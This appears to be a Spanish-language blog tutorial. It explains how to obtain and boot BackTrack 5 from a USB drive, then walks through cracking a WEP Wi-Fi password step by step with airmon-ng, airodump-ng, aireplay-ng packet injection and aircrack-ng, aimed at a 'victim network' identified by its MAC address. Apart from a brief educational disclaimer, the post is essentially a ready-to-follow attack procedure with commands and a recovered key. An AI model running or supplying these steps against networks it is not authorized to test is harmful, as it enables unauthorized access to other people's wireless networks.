BackTrack 5
Aclaración;"Este post es con fines Educativos y/o Didácticos, no me hago responsable del uso malicioso"
Para emplear todo este proceso necesitas tener una interfaz de red inalámbrica (Wifi)
Tener BackTrack 5 :No me digas: y un poco de conocimiento en GNU/Linux (saber usar la Terminal)
Descarga Personalizada
Primero nos dirigimos a la pagina de descarga de BackTrack 5
Escojan versión: Yo elegí Backtrack 5 R3
Windows Manager (manejador de ventanas): Yo elegí gnome, ya que para mi es mas cómodo
Escojan su arquitectura: Mi arquitectura es de 32bits
Tipo de Imagen: ISO (100% Recomendable)
Tipo de descarga: Directo (Descarga Directa)
Nota la ISO pesa mas de 3Gb así que si y tienes una conexión lenta descarga el torrent para descargarlo en 2 días como máximo con el programa Utorrent
Descarga Directa, Si tienes una buena conexión
Booteamos BackTrack 5
USB Mínimo 4 Gb
DVD Mínimo 4.7 Gb
Programa para bootear en una Pendrive
Pueden usar LinuxLiveUSB Home LinuxLiveUsb
o UNetbootin Home UNetbooting
Yo usaré UNetbooting
Un Pequeño MiniTuto
2.- Elegirán la versión de la distribución.
3.- Selecciona la ruta donde se encuentra la imagen ISO de BackTrack 5.
4.- Selecciona el tipo de unidad, puede ser un Pendrive o un Disco duro.
5.- Selecciona la letra de la unidad.
6.- Esta opción se seleccionara automáticamente al hacer todo bien.
7.- Ahora dan clic en aceptar y comenzara la instalación en la memoria, después de unos minutos el proceso terminara y ya podemos ejecutar el BackTrack 5 desde una Memoria USB.
Ahora si empecemos
airmon-ng
Y nos aparecerá el nombre de nuestra interfaz, el chipset y el driver en mi caso es una el nombre de la interfaz es Wlan0
2. Paso: Ya qué conocemos el nombre de nuestra interfaz procedemos a colocar en Modo Monitor y escribimos lo siguiente:
airmon-ng start wlan0
Ya tenemos nuestra targeta en Modo Monitor (monitor mode enabled on mon0) se podrán dar cuenta "mon0" es el nombre de la interfaz en modo monitor.
3. Paso: Ahora vamos a escanear redes disponibles con el siguiente comando:
airodump-ng mon0
Y con esto comenzará a mostrarnos las Redes Disponibles. Para seleccionar la Red Víctima tenemos qué detener el escaneo presionando ctrl+c
4. Paso: En este paso vamos a Capturar la Red Víctima para esto escribimos el siguiente comando:
airodump-ng -w redes -c 11 --bssid 00:22:A4:30:FE:59 mon0
donde
-w = especifica el nombre del archivo donde se guarda la captura de datos
-c = especifica el canal de la Red
--bssid = especifica Mac de Punto de Acceso
mon0 = especifica la interfaz de la targeta de Red en Modo Monitor
-c = especifica el canal de la Red
--bssid = especifica Mac de Punto de Acceso
mon0 = especifica la interfaz de la targeta de Red en Modo Monitor
5. Paso: Abrimos una segunda Terminal (sin cerrar la primera) y escribimos lo siguiente:
aireplay-ng -1 0 -a 00:22:A4:30:FE:59 mon0
esto es para Asociar su pc con la Red Víctima
6. Paso: Ahora si viene lo bueno, a inyectar paquetes a la red, para esto tecleamos lo siguiente:
aireplay-ng -3 -b 00:22:A4:30:FE:59 mon0
con esto enviaremos y recibiremos paquetes. Vamos a la primera Terminal y en la columna #Data se incrementará rapidamente, y esperamos a que llegue a los 30,000 datos para poder desemcriptar la Clave
7. Paso: Cuando llegue a los 30,000 datos abrimos una tercera y última Terminal y escribimos el famoso comando:
aircrack-ng redes-01.cap
redes =archivo donde se guarda la captura (.cap) el mismo qué mencionamos en el paso 3
damos enter y empezará a decifrar a la clave y Vualá Clave desemcriptada
Key Found¡ (09:86:23:47:63)
Y en dado caso de qué no entiendan, les dejo 2 Vídeos
Eso es todo
Viva el Software Libre
Comentarios
Publicar un comentario